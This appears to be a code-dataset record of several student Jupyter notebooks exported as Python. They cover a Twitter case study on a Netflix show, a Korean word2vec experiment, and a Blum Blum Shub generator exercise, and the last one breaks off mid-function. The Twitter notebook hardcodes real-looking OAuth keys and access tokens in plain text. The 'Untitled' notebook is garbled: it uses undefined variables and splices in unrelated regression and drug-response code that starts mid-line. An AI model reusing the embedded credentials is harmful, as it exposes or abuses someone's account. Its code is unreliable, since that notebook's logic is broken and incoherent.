0fa29b2dba3524237368ab8aa27d52635ec22d8a
|
[] |
no_license
|
den19/Python-for-Data-Science-AI-and-Development
|
https://github.com/den19/Python-for-Data-Science-AI-and-Development
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 25,796 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Case Study 1 : Data Science in Twitter Data
# **Required Readings:**
# * Chapter 1 and Chapter 9 of the book [Mining the Social Web](http://cdn.oreillystatic.com/oreilly/booksamplers/9781449367619_sampler.pdf)
# * The codes for [Chapter 1](http://bit.ly/1qCtMrr) and [Chapter 9](http://bit.ly/1u7eP33)
# * [TED Talks](https://www.ted.com/talks) for examples of 10 minutes talks.
#
#
# ** NOTE **
# * Please don't forget to save the notebook frequently when working in Jupyter Notebook, otherwise the changes you made can be lost.
#
# *----------------------
# # Problem: pick a data science problem that you plan to solve using Twitter Data
# * The problem should be important and interesting, which has a potential impact in some area.
# * The problem should be solvable using twitter data and data science solutions.
#
# Please briefly describe in the following cell: what problem are you trying to solve? why this problem is important and interesting?
# +
# DS 501
# Case Study 1
# Group6
# Aashish Bagul
# Fangzheng Sun
# Huanhan Liu
# Qian Xu
#As we know, Netflix is still the most powerful TV streaming company but with the development of other companies like HBO.
#Domestically, there’s no doubt the landscape has gotten a lot more competitive for Netflix,the market share of Netflix is under threat.
#In next month, a new TV show produced by Netflix named Iron Fist based on the Marvel Comics character will release, whether this TV show will be successful means a lot to Netflix
#We want to help Netflix figure out how to make this TV show successful and popular by rational advertising
# -
# ## Data Collection: Download Twitter Data using API
# * In order to solve the above problem, you need to collect some twitter data. You could select a topic that is relevant to your problem, and use Twitter API to download the relevant tweets. It is recommended that the number of tweets should be larger than 200, but smaller than 1 million.
# * Store the tweets you downloaded into a local file (txt file or json file)
# +
import twitter
import json
#---------------------------------------------
# Define a Function to Login Twitter API
def oauth_login_stream():
    """Authenticate with the Twitter OAuth credentials and return a
    twitter.TwitterStream handle for the streaming API."""
    # Go to http://twitter.com/apps/new to create an app and get values
    # for these credentials that you'll need to provide in place of these
    # empty string values that are defined as placeholders.
    # See https://dev.twitter.com/docs/auth/oauth for more information
    # on Twitter's OAuth implementation.
    # SECURITY NOTE(review): real-looking API keys/tokens are committed in
    # source here. They should be revoked and loaded from environment
    # variables or a config file excluded from version control.
    CONSUMER_KEY = 'OdxhYo9fj4llzv19A7sfcwNUH'
    CONSUMER_SECRET ='NGD30oWMTMoKXSlZdktIC4A8jzyFQmUuyPJlYo3PnIMwvUy7UF'
    OAUTH_TOKEN = '813487117003354112-ccS8P5rAJ85mfPCJhYtdbnZamfQ2V82'
    OAUTH_TOKEN_SECRET = 'QRLxSLs3YL1jvVdlmE57PM8YkgLNRw7hbgaGMBhKngCJB'
    auth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET,
                               CONSUMER_KEY, CONSUMER_SECRET)
    # TwitterStream wraps the streaming endpoint (as opposed to the REST API).
    twitter_stream = twitter.TwitterStream(auth=auth)
    print(twitter_stream)
    return twitter_stream
twitter_stream = oauth_login_stream()
# Create a iterator to track 2000 updated tweets with words "Iron Fist" and collect them.
iterator = twitter_stream.statuses.filter(track="Iron Fist" or "IronFist", language="en")
tweet_count = 0
list=[]
for tweet in iterator:
tweet_count += 1
list.append(tweet)
if tweet_count >= 2000: # actually it's hard to get such amonunt of tweets, so we stop half way and get 1188 tweets.
break
data=json.dumps(list,indent=4)
#save the collected data into iron_data.txt file.
file = open('iron_data.txt','w')
file.write(data)
file.close()
# -
# ### Report statistics about the tweets you collected
# +
# The total number of tweets collected: <1188>
# It takes long time to generate 2000, so we stop and store the 1188 tweets.
# -
# # Data Exploration: Exploring the Tweets and Tweet Entities
#
# **(1) Word Count:**
# * Load the tweets you collected in the local file (txt or json)
# * compute the frequencies of the words being used in these tweets.
# * Plot a table of the top 30 most-frequent words with their counts
# +
import json
from collections import Counter
from prettytable import PrettyTable
# Open the iron_data.txt and save the useful data into three lists, text, hashtages and words.
tweets_file = open('iron_data.txt', "r")
data = tweets_file.read()
iron = json.loads(data)
ir_texts = [ da['text'] for da in iron]
hashtags = [ hashtag['text']
for da in iron
for hashtag in da['entities']['hashtags'] ]
words = [ w
for t in ir_texts
for w in t.split() ]
# Compute the frequencies of the words.
label='Word'
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(words)
# Plot a table of the top 30 words with their counts using Prettytable.
[ pt.add_row(kv) for kv in c.most_common()[:30] ]
pt.align[label], pt.align['Count'] = 'l', 'r'
print(pt)
# -
# ** (2) Find the most popular tweets in your collection of tweets**
#
# Please plot a table of the top 10 most-retweeted tweets in your collection, i.e., the tweets with the largest number of retweet counts.
#
# +
# Your code starts here
# Please add comments or text cells in between to explain the general idea of each block of the code.
# Please feel free to add more cells below this cell if necessary
# Check the retweeted status and count the number of retweets in each one of the collected data
# and extract the information their users, screen_name and text.
retweets = [
(da['retweeted_status']['retweet_count'],
da['retweeted_status']['user']['screen_name'],
da['text'])
for da in iron
if 'retweeted_status' in da
]
# Plot a table of the top 10 tweets with the largest number of retweet counts.
pt = PrettyTable(field_names=['Count', 'Screen Name', 'Text'])
[ pt.add_row(row) for row in sorted(retweets, reverse=True)[:10] ]
pt.max_width['Text'] = 70
pt.align= 'l'
print(pt)
# -
# **(3) Find the most popular Tweet Entities in your collection of tweets**
#
# Please plot the top 10 most-frequent hashtags and top 10 most-mentioned users in your collection of tweets.
# +
# Save the hashtag' information into a list.
hashtags = [ hashtag['text']
for da in iron
for hashtag in da['entities']['hashtags'] ]
# Save the usermentions' information into a list.
usermentions = [ mention['name']
for da in iron
for mention in da['entities']['user_mentions'] ]
# Plot the top 10 most-frequent hashtags and top 10 most-mentioned users of tweets
for label, data in(('hashtags',hashtags),
('user mentions',usermentions)):
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(data)
[ pt.add_row(kv) for kv in c.most_common()[:10] ]
pt.align[label], pt.align['Count'] = 'l', 'r' # Set column alignment
print(pt)
# -
# Plot a histogram of the number of user mentions in the list using the following bins.
# +
import numpy as np
import random
from matplotlib import pyplot as plt
bins=[0, 1, 10, 20, 30, 40, 50, 100]
# This is all the counts values of user mentions in the data, manually got from the above data
list = [2, 2, 2, 1, 1, 5, 2, 1, 2, 1, 2, 3, 1, 2, 1, 1, 8, 18, 1, 1, 1, 2, 1, 1, 1, 1, 1, 2, 6, 1, 1, 1, 1, 2, 10, 41, 1, 2, 1, 1,
4, 1, 3, 1, 1, 1, 1, 1, 10, 7, 1, 1, 1, 13, 1, 1, 33, 1, 1, 1, 14, 2, 2, 1, 1, 1, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 3, 6, 1, 1,
2, 1, 1, 1, 1, 1, 4, 1, 2, 16, 1, 1, 2, 2, 3, 2, 1, 1, 2, 2, 2, 1, 134, 1, 1, 1, 3, 1, 3, 1, 2, 1, 1, 3, 12, 9, 1, 1, 3, 1,
1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 9, 1, 1, 1, 4, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 3, 1, 1, 1, 1, 1, 1, 1, 12, 3, 1,
2, 1, 1, 3, 1, 1, 1, 7, 1, 24, 1, 1, 2, 1, 1, 1, 6, 1, 3, 1, 2, 1, 6, 2, 15, 1, 4, 1, 1, 1, 1, 6, 2, 1, 7, 3, 3, 2, 2, 1, 1,
1, 1, 1, 1, 1, 9, 1, 2, 4, 1, 1, 2, 10, 1, 3, 1, 1, 1, 28, 21, 1, 8, 1, 1, 2, 2, 2]
plt.xlim([min(list)-5, max(list)+5])
plt.hist(list, bins=bins, alpha=0.5)
plt.title('histogram of the number of user mentions')
plt.xlabel('Users being mentioned')
plt.ylabel('count')
plt.show()
# -
#
# ** (4) Getting "All" friends and "All" followers of a popular user in the tweets**
# * choose a popular twitter user who has many followers in your collection of tweets.
# * Get the list of all friends and all followers of the twitter user.
# * Plot 20 out of the followers, plot their ID numbers and screen names in a table.
# * Plot 20 out of the friends (if the user has more than 20 friends), plot their ID numbers and screen names in a table.
# +
import tweepy
from tweepy import Stream, OAuthHandler
from tweepy.streaming import StreamListener
from prettytable import PrettyTable
# Variables that contains the user credentials to access Twitter API.
CONSUMER_KEY = 'TJbcvtJKeOLIC7VJ1P1ueD0Ex'
CONSUMER_SECRET ='Bt30IV0EXK4TOIkuonXEA8llQPW8IsFc8Hhh9y5lSGrWUjtRZv'
ACCESS_TOKEN = '776632770185596928-HleyQ6UtvVPWVcd19vdE8lMz48A3VoJ'
ACCESS_SECRET = 'ph1fjEuyT7ED7zNPoUTL3ZEJGqxRhJBRtAqEH5z7CZXHp'
auth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
# Provides a wrapper for the API as provided by Twitter.
if __name__ == "__main__":
user_choose = "FinnJones"
user = api.get_user(user_choose)
print(user.screen_name)
friends = api.friends_ids(user_choose)
followers = api.followers_ids(user_choose)
print('Number of friends:', len(friends))
print("Number of followers(Show 5000 if 5000+):", len(followers))
# Get the first 20 id of friends/followers
friend_list = friends[0:20]
follower_list = followers[0:20]
# Plot 20 out of the friends
user_choose_friends = PrettyTable(["user_id","screen_name"])
for friends_id in (friend_list)[0:20]:
user_choose_friends.add_row([friends_id, api.get_user(friends_id).screen_name] )
print("user_choose_friends:")
print(user_choose_friends)
# Plot 20 out of the followers
user_choose_follows = PrettyTable(["user_id","screen_name"])
for follows_id in (follower_list)[0:20]:
user_choose_follows.add_row([follows_id, api.get_user(follows_id).screen_name] )
print("user_choose_follows:")
print(user_choose_follows)
api.get_user(friends_id).screen_name
mutual = set(friends).intersection(set(followers))
print("Mutual friend's set:")
print(mutual)
# Plot mutual friend's ID numbers and screen names in a table
mutual_friends = PrettyTable(["user_id","screen_name"])
for friends_id in mutual:
mutual_friends.add_row([friends_id, api.get_user(friends_id).screen_name] )
print("mutual_friends:")
print(mutual_friends)
# -
# # The Solution: implement a data science solution to the problem you are trying to solve.
# Briefly describe the idea of your solution to the problem in the following cell:
#Our team collect information about Iron Fist on Twitter first and then figure out the source of those tweets
#And also collect the information about the users who is more likely to be the potential audience of Iron Fist
#Finally, we discover the location of those users and find out how would Netflix focus on different areas.
inf = [ da['user']['location']
for da in iron]
label="Location"
pt = PrettyTable(field_names=[label, 'Count'])
c = Counter(inf)
[ pt.add_row(kv) for kv in c.most_common()[:20] ]
pt.align[label], pt.align['Count'] = 'l', 'r'
print(pt)
# # Results: summarize and visualize the results discovered from the analysis
#
# The figure and tables are all in our PPT.
#
# *-----------------
# # Done
#
# All set!
#
# ** What do you need to submit?**
#
# * **Notebook File**: Save this Jupyter notebook, and find the notebook file in your folder (for example, "filename.ipynb"). This is the file you need to submit. Please make sure all the plotted tables and figures are in the notebook. If you used "jupyter notebook --pylab=inline" to open the notebook, all the figures and tables should have shown up in the notebook.
#
# * **PPT Slides**: please prepare PPT slides (for 10 minutes' talk) to present about the case study . Each team present their case studies in class for 10 minutes.
#
# Please compress all the files in a zipped file.
#
#
# ** How to submit: **
#
# Please submit through Canvas, in the Assignment "Case Study 1".
#
# ** Note: Each team only needs to submit one submission in Canvas **
#
# # Peer-Review Grading Template:
#
# ** Total Points: (100 points) ** Please don't worry about the absolute scores, we will rescale the final grading according to the performance of all teams in the class.
#
# Please add an "**X**" mark in front of your rating:
#
# For example:
#
# *2: bad*
#
# **X** *3: good*
#
# *4: perfect*
#
#
# ---------------------------------
# The Problem:
# ---------------------------------
#
# 1. (5 points) how well did the team describe the problem they are trying to solve using twitter data?
# 0: not clear
# 1: I can barely understand the problem
# 2: okay, can be improved
# 3: good, but can be improved
# 4: very good
# 5: crystal clear
#
# 2. (10 points) do you think the problem is important or has a potential impact?
# 0: not important at all
# 2: not sure if it is important
# 4: seems important, but not clear
# 6: interesting problem
# 8: an important problem, which I want to know the answer myself
# 10: very important, I would be happy invest money on a project like this.
#
# ----------------------------------
# Data Collection:
# ----------------------------------
#
# 3. (10 points) Do you think the data collected are relevant and sufficient for solving the above problem?
# 0: not clear
# 2: I can barely understand what data they are trying to collect
# 4: I can barely understand why the data is relevant to the problem
# 6: the data are relevant to the problem, but better data can be collected
# 8: the data collected are relevant and at a proper scale (> 300 tweets)
# 10: the data are properly collected and they are sufficient
#
# -----------------------------------
# Data Exploration:
# -----------------------------------
# 4. How well did the team solve the following task:
# (1) Word Count (5 points):
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (2) Find the most popular tweets in your collection of tweets: (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (3) Find popular twitter entities (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# (4) Find user's followers and friends (5 points)
# 0: missing answer
# 1: okay, but with major problems
# 3: good, but with minor problems
# 5: perfect
#
# -----------------------------------
# The Solution
# -----------------------------------
# 5. how well did the team describe the solution they used to solve the problem?
# 0: not clear
# 2: I can barely understand
# 4: okay, can be improved
# 6: good, but can be improved
# 8: very good
# 10: crystal clear
#
# 6. how well is the solution in solving the problem?
# 0: not relevant
# 1: barely relevant to the problem
# 2: okay solution, but there is an easier solution.
# 3: good, but can be improved
# 4: very good, but solution is simple/old
# 5: innovative and technically sound
#
# 7. how well did the team implement the solution in python?
# 0: the code is not relevant to the solution proposed
# 2: the code is barely understandable, but not relevant
# 4: okay, the code is clear but incorrect
# 6: good, the code is correct, but with major errors
# 8: very good, the code is correct, but with minor errors
# 10: perfect
#
# -----------------------------------
# The Results
# -----------------------------------
# 8. How well did the team present the results they found in the data?
# 0: not clear
# 2: I can barely understand
# 4: okay, can be improved
# 6: good, but can be improved
# 8: very good
# 10: crystal clear
#
# 9. How do you think the results they found in the data?
# 0: not clear
# 1: likely to be wrong
# 2: okay, maybe wrong
# 3: good, but can be improved
# 4: make sense, but not interesting
# 5: make sense and very interesting
#
# -----------------------------------
# The Presentation
# -----------------------------------
# 10. How all the different parts (data, problem, solution, result) fit together as a coherent story?
# 0: they are irrelevant
# 1: I can barely understand how they are related to each other
# 2: okay, the problem is good, but the solution doesn't match well, or the problem is not solvable.
# 3: good, but the results don't make much sense in the context
# 4: very good fit, but not exciting (the storyline can be improved/polished)
# 5: a perfect story
#
# 11. Did the presenter make good use of the 10 minutes for presentation?
# 0: the team didn't present
# 1: bad, barely finished a small part of the talk
# 2: okay, barely finished most parts of the talk.
# 3: good, finished all parts of the talk, but some part is rushed
# 4: very good, but the allocation of time on different parts can be improved.
# 5: perfect timing and good use of time
#
# 12. How well do you think of the presentation (overall quality)?
# 0: the team didn't present
# 1: bad
# 2: okay
# 3: good
# 4: very good
# 5: perfect
#
#
# -----------------------------------
# Overall:
# -----------------------------------
# 13. How many points out of the 100 do you give to this project in total? Please don't worry about the absolute scores, we will rescale the final grading according to the performance of all teams in the class.
# Total score:
#
# 14. What are the strengths of this project? Briefly, list up to 3 strengths.
# 1:
# 2:
# 3:
#
# 15. What are the weaknesses of this project? Briefly, list up to 3 weaknesses.
# 1:
# 2:
# 3:
#
# 16. Detailed comments and suggestions. What suggestions do you have for this project to improve its quality further.
#
#
#
#
# ---------------------------------
# Your Vote:
# ---------------------------------
# 1. [Overall Quality] Between the two submissions that you are reviewing, which team would you vote for a better score?
# -1: I vote the other team is better than this team
# 0: the same
# 1: I vote this team is better than the other team
#
# 2. [Presentation] Among all the teams in the presentation, which team do you think deserves the best presentation award for this case study?
# 1: Team 1
# 2: Team 2
# 3: Team 3
# 4: Team 4
# 5: Team 5
# 6: Team 6
# 7: Team 7
# 8: Team 8
# 9: Team 9
# 10: Team 10
#
#
| 20,041 |
/PYTHON/test/Untitled.ipynb
|
37400a6b93fe8cf32fd77d2210c38b6c366511e9
|
[] |
no_license
|
SunPyoNoh/TIL
|
https://github.com/SunPyoNoh/TIL
| 0 | 1 | null | 2022-10-16T02:39:39 | 2019-12-03T08:13:40 |
Python
|
Jupyter Notebook
| false | false |
.py
| 7,250 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from collections import Counter
from konlpy.tag import Kkma
from konlpy.utils import pprint
from konlpy.tag import Twitter
from konlpy.tag import Komoran
from gensim.models import word2vec
import matplotlib.pyplot as plt
import re
# +
file = open('./test.txt','r',encoding='utf-8')
lines = file.read()
sentences = re.split('(?<=[2-9]\n)|(?<=[0-9][0-9]\n)|(?<=[0-9][0-9][0-9]\n)', lines)
# -
sent=[]
for stuff in sentences:
sent.append(stuff)
data = word2vec.LineSentence(result)
model = word2vec.Word2Vec(data,
size=200,window=10,hs=1,min_count=2,sg=1)
result = []
for line in sent:
r = []
words = twitter.pos(line,norm=True)
for word in words:
if word[1] not in ["Punctuation","Eomi","Josa"]:
r.append(word[0])
result.append(" ".join(r).strip())
print(result[1000])
# +
# model.save("toji.model")
# model = word2vec.Word2Vec.load('toji.model')
# things = model.most_similar(positive["집"])
print(list(model.wv.vocab.keys()))
# print(things)
# +
# stop_words=stop_words.split(' ')
# result = []
# for w in noun_adj_list:
# word_tokens = word_tokenize(w)
# if word_tokens not in stop_words:
# result.append(w)
# -
model = word2vec.Word2Vec(data, size=200,window=10,hs=1,min_count=2,sg=1)
# +
# window크기 5, 최소 출현수 2, skip-gram, 10000번 학습
model = Word2Vec(noun_adj_list,window = 5,min_count=2,sg=1,iter=10000)
print(list(model.wv.vocab.keys()))
print("vocab length : %d"%len(model.wv.vocab))
print(model.wv.most_similar("범"))
# -
df = pd.DataFrame({'Actual': y_test, 'Predicted': y_pred})
df #COMPARING ACTUAL AND PREDICTED VALUES
# ## PREDICTING THE PERCENTAGE BASED ON NO. OF HOURDS
# +
percentage=reg.predict([[9.25]])
print("Percentage after studying for 9.25 hrs/day",percentage)
# -
# ## EVALUATING THE ALGORITHM
from sklearn import metrics
from sklearn.metrics import r2_score
print('Mean Absolute Error:',metrics.mean_absolute_error(y_test, y_pred))
print('Mean Squared Error:',metrics.mean_squared_error(y_test, y_pred))
print('R2 Score' , r2_score(y_test,y_pred))
_residual_standard_error', 'EC50_residual_standard_error']]
# Then we join the run data with the model data, setting Drugname and run pairs as the index. We select non-compromised runs and drop dubplicate rows. Finally, we give each run a quality score equal to the IC or EC quality of the drug used depending on what metric the model was trained on
full = drug_data.join(data, on='run', rsuffix='_drug').reset_index().set_index(['Drug', 'run'])
full = full[full['started'] > pd.to_datetime('2020-04-15 18:00:00')].drop_duplicates()
full['Quality'] = [c_dict.loc[i[0]]['IC'] if full.loc[i]['metric_drug'][0]=='AUC_IC50' else c_dict.loc[i[0]]['EC'] for i in full.index]
full['Quality'] = full['Quality'].fillna(-1)
# Here we plot IC/EC quality vs $ r^2 $. We observe clear drop-offs for very low quality and for very high quality. We will drop all runs under a specific quality threhsold since these models can be considered faulty (the data they received wasn't good)
sns.set()
g = sns.relplot(x='Quality', y='r2_score', data=full, kind='scatter', height=9, col='metric_drug', hue='metric_drug', legend=False)
g.set(yscale='symlog')
g.set(ylim=(None, 3))
#plt.savefig('IC quality vs r2.png')
# Now we plot the IC/EC quality vs average $ r^2 $ of models trying to predict resistance to a specific drug. All models predicting the resistance to a drug with very low average quality are dropped.
drug_ic = full.groupby('Drug').mean()
drug_ic['CCLs'] = [dr[dr['Drug_name']==i].shape[0] for i in drug_ic.index]
sns.set(font_scale=1.3)
fig, ax = plt.subplots(figsize=(1.9*5,5))
g = sns.scatterplot(x='Quality', y='r2_score', data=drug_ic, hue='CCLs', ax=ax, legend='brief')
g.set(yscale='symlog')
plt.legend(loc='lower right')
plt.tight_layout()
#plt.savefig('graphs/ICqualitylog.eps', format='eps')
# ## A threshold of -0.95 IC quality is set
# All runs below that are disregarded
sns.set(font_scale=1)
g = sns.relplot(x='Quality', y='r2_score', data=full, kind='scatter', height=8, aspect=1.7)
g.set(yscale='symlog')
#plt.legend(loc = 'lower right')
#plt.savefig('Chop.png')
full = full[full['Quality']>-0.95]
full = full[full['started'] > pd.to_datetime('2020-04-15 18:00:00')]
full['norm'] = full['norm'].fillna('None')
# Here we create a dataframe containing the average $ r^2 $ for all drugs
d_r = full[['Drug', 'r2_score']].groupby('Drug').mean()
# Here we calculate the drug-agnostic $ r^2 $ for all different runs, this is done by substracting the average $ r^2 $ for the drug being modeled from the $ r^2 $ obtained
full['r2'] = [full.loc[i]['r2_score']-d_r.loc[full.loc[i]['Drug']]['r2_score'] for i in full.index]
# Here we create a column that contains, feda, ajive or none depending on the domain adaptation method used
full['da'] = ['feda' if full.loc[i]['feda'] else 'ajive' if full.loc[i]['ajive'] is not None and full.loc[i]['ajive']>0 else 'none' for i in full.index]
| 5,306 |
/blumblum.ipynb
|
aac2affe41cab4cd403b2f4f0463bd670231bbad
|
[] |
no_license
|
evdokiaa/Crypto
|
https://github.com/evdokiaa/Crypto
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 40,934 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Ασκηση 6 - Γεννητρια BlumBlumShub
import random
import math
import gmpy2
# Ορίζουμε ορισμένες συναρτήσεις που θα μας φανούν χρήσιμες αργότερα.
# +
#επαναλαμβανόμενος τετραγωνισμός
def fastmod(base, power, mod):
    """Modular exponentiation by repeated squaring: base**power % mod.

    Fix: the original halved the exponent with true division (`power/2`),
    which converts it to a float; for exponents beyond ~2**53 the float
    loses precision and the result is silently wrong. Integer floor
    division keeps the computation exact for arbitrarily large exponents.
    """
    result = 1
    while power > 0:
        if power % 2 == 1:
            result = (result * base) % mod
            power = power - 1
        power = power // 2          # exact integer halving (was float `/ 2`)
        base = (base * base) % mod
    return result % mod
#επιστρέφει τους διαιρέτες του n
def divisors(n):
    """Return the proper divisors of n (excluding 1 and n itself).

    Small divisors (<= sqrt(n)) come first in ascending order, followed by
    their large cofactors n//d in the order the small ones were found.
    """
    small = [d for d in range(2, int(math.sqrt(n) + 1)) if n % d == 0]
    # For a perfect square, skip the cofactor of sqrt(n) to avoid a duplicate.
    large = [n // d for d in small if d * d != n]
    return small + large
#true αν ειναι σχετικά πρώτοι, false διαφορετικά
def coprime(a, b):
    """Return True when a and b share no common factor besides 1."""
    return math.gcd(a, b) == 1
#έλεγχος πρώτων αριθμών με το τεστ του fermat
def fermat_test(n, k):
    """Probabilistic Fermat primality test with k random witnesses.

    Returns True when n passes all k rounds (n is probably prime, modulo
    Carmichael numbers), False when a witness proves n composite.

    Fixes: the original crashed on n < 2 (``randint(1, 0)``) and was called
    elsewhere with integer-valued floats; n is coerced to int and small
    values are rejected up front. The builtin 3-argument ``pow`` replaces
    the hand-rolled modular exponentiation (same math, C speed).
    """
    n = int(n)  # callers sometimes pass integer-valued floats like (p-1)/2
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    for _ in range(k):
        a = random.randint(1, n - 1)
        if pow(a, n - 1, n) != 1:  # Fermat: a^(n-1) ≡ 1 (mod n) for prime n
            return False
    return True
#true αν το p είναι Safe prime, false διαφορετικά
def safePrime(p):
    """True when p is a safe prime: p prime, p % 4 == 3 and (p-1)/2 prime.

    Fix: ``(p-1)/2`` was true division, passing a float into fermat_test;
    integer floor division keeps the Sophie-Germain candidate exact.
    """
    if (p > 3 and p % 4 == 3 and fermat_test(p, 200) and fermat_test((p - 1) // 2, 200)):
        return True
    return False
#true αν το p είναι Safe Safe prime, false διαφορετικά
def safeSafePrime(p):
    """True when p is a safe prime whose (p-1)/2 is itself a safe prime.

    Fix: ``(p-1)/2`` was true division (float); floor division keeps the
    candidate an exact integer for arbitrarily large p.
    """
    if (safePrime(p) and safePrime((p - 1) // 2)):
        return True
    return False
def parity(n):
    """Bit parity of a non-negative integer n: 1 for an odd number of set
    bits, 0 for an even number.

    Fix/idiom: replaces the Brian-Kernighan clear-lowest-bit loop with a
    C-speed ``bin().count``; the original also hung forever on negative n,
    which now simply yields the parity of the magnitude's bits.
    """
    return bin(n).count("1") % 2
# -
# Ερώτημα α.
# Θα βρούμε το s και το Ν, σύμφωνα με τις 2 προυποθέσεις που ορίστηκαν στο ερώτημα 5α:
# 1. N τέτοιο, έτσι ωστε το 2 έχει τάξη λ(λ(Ν)) στην ομάδα λ(Ν)/2.
# 2. s τέτοιο, ώστε να έχει τάξη λ(Ν)/2 στην ομάδα Ν.
#
#
# +
#βρίσκει εναν Safe Safe prime με μηκος σε bits που ορίζουμε
def findSafeSafePrime(bits):
    """Draw random `bits`-bit integers until one passes safeSafePrime."""
    while True:
        candidate = random.getrandbits(bits)
        if safeSafePrime(candidate):
            return candidate
#υπολογισμός της λ(Ν) για τα δεδομένα του προβλήματος μας, οπου p,q SafeSafe primes
def lamda(p, q):
    """Carmichael lambda of N = p*q for safe-safe primes p, q.

    With p = 2p'+1 and q = 2q'+1 this is lcm(p-1, q-1) = 2*p'*q'.

    Fix: the original computed p', q' with float division and truncated via
    ``int(...)``; floats lose precision for cryptographically sized primes,
    so the whole computation is now exact integer arithmetic.
    """
    p1 = (p - 1) // 2
    q1 = (q - 1) // 2
    return 2 * p1 * q1
#το ίδιο για τη λ(λ(Ν))
def lamda_lamda(p, q):
    """lambda(lambda(N)) for N = p*q with safe-safe primes p, q.

    With p = 2p'+1, p' = 2p''+1 (and likewise for q) this is 2*p''*q''.

    Fix: same float-division precision bug as in ``lamda`` — all divisions
    are now exact integer floor divisions.
    """
    p2 = ((p - 1) // 2 - 1) // 2
    q2 = ((q - 1) // 2 - 1) // 2
    return 2 * p2 * q2
#Condition1 για μέγιστη περίοδο
def condition1(p, q):
    """Maximal-period condition on N = p*q: True iff 2 has multiplicative
    order lamda_lamda(p, q) in the group modulo lamda(p, q)/2.

    Fix: the original returned None (fell off the end) when
    ``2**l_l % l != 1``; the caller ``findN`` tests ``condition1(...) == 0``,
    and ``None == 0`` is False, so a failing candidate was accepted as if it
    had passed. The failure path now returns an explicit False.
    """
    l_l = lamda_lamda(p, q)
    l = int(lamda(p, q) / 2)
    if fastmod(2, l_l, l) != 1:
        return False  # 2's order does not divide l_l at all
    # Order must be exactly l_l: no proper divisor of l_l may already give 1.
    for x in divisors(l_l):
        if fastmod(2, x, l) == 1:
            return False
    return True
#επιστρέφει ένα s, σχετικά πρώτο με το Ν
def coprime_seed(p, q):
    """Draw random seeds in [3, p*q] until one is coprime to both p and q."""
    while True:
        s = random.randint(3, p * q)
        if coprime(s, p) and coprime(s, q):
            return s
#condition2 για μέγιστη περίοδο
def condition2(p, q, s):
    """Maximal-period condition on the seed: True iff s has multiplicative
    order lamda(p, q)/2 in the group modulo N = p*q.

    Fix: like ``condition1``, the original returned None when
    ``s**l % N != 1``; that happened to behave like False under ``not``,
    but the failure path is now an explicit ``return False`` for clarity
    and for any caller comparing against 0.
    """
    l = int(lamda(p, q) / 2)
    if fastmod(s, l, p * q) != 1:
        return False  # s's order does not divide l at all
    # Order must be exactly l: no proper divisor of l may already give 1.
    for x in divisors(l):
        if fastmod(s, x, p * q) == 1:
            return False
    return True
#βρίσκει Ν, για το οποιο πληρείται το 1ο condition
def findN(bits):
    """Draw safe-safe prime pairs (p, q) until p != q and condition1 holds;
    return (p, q, p*q)."""
    while True:
        p = findSafeSafePrime(bits)
        q = findSafeSafePrime(bits)
        # Mirrors the original acceptance test `not (cond == 0 or p == q)`.
        if condition1(p, q) != 0 and p != q:
            return (p, q, p * q)
#επιστρέφει ενα s, έτσι ώστε να πληρείται το 2ο condition.
def findSeed(p, q):
    """Draw coprime seeds until one satisfies condition2 (maximal period)."""
    while True:
        s = coprime_seed(p, q)
        if condition2(p, q, s):
            return s
#βρίσκει όλες τις αρχικές τιμές της γεννήτριας, p,q,s.
def create_generator(bits):
    """Produce all BBS initial values: primes p, q (via findN) and seed s."""
    p, q, _N = findN(bits)
    return p, q, findSeed(p, q)
# -
p,q,s = create_generator(20)
print('p:',p)
print('q:',q)
print('N:' , p*q)
print('s:',s)
# Eρώτημα β: Πειραματική επαλήθευση της περιόδου.
# Εδώ θα το τρέξουμε για λίγο μικρότερο αριθμό bits.
# +
def period(p, q, s):
    """Empirically verify that the BBS state sequence x -> x^2 mod N returns
    to the seed s after exactly lamda_lamda(p, q) squarings (the expected
    maximal period), printing any shorter period found along the way."""
    N = p*q
    # Expected period of the state sequence; `period` shadows the function
    # name locally, which is harmless here but worth noting.
    period = lamda_lamda(p,q)
    # gmpy2.mpz speeds up the big-integer arithmetic of the first squaring.
    s1=gmpy2.mpz(s)
    for i in range(1,period+1):
        s1 = fastmod(s1,2,N)
        if (s1 == s and i<period):
            # Returned to the seed early -> the true period divides i.
            print('μικρότερη περίοδος:' ,i)
            break
    # NOTE(review): this line also runs after an early break, in which case
    # its "period is as expected" message is misleading — confirm intent.
    print('s μετα απο λ(λ(Ν)) επαναλήψεις:', s1, 'οπότε η περίοδος είναι επιθυμητή:', i)
p,q,s = create_generator(14)
print('p:',p, 'q:', q, 's:', s)
print('H αναμενόμενη περίοδος είναι:', lamda_lamda(p,q))
period(p,q,s)
# -
# Ερώτημα δ,ε. Πειραματική προσέγγιση του π.
# +
#implementation of blumblumshub generator, for fixed number of bits
def blum(p, q, s, bits, mode):
    """Run the Blum-Blum-Shub generator for `bits` squaring steps.

    Each step advances the state x -> x^2 mod (p*q) and appends one output
    bit: mode 1 takes the state's least significant bit, mode 2 takes the
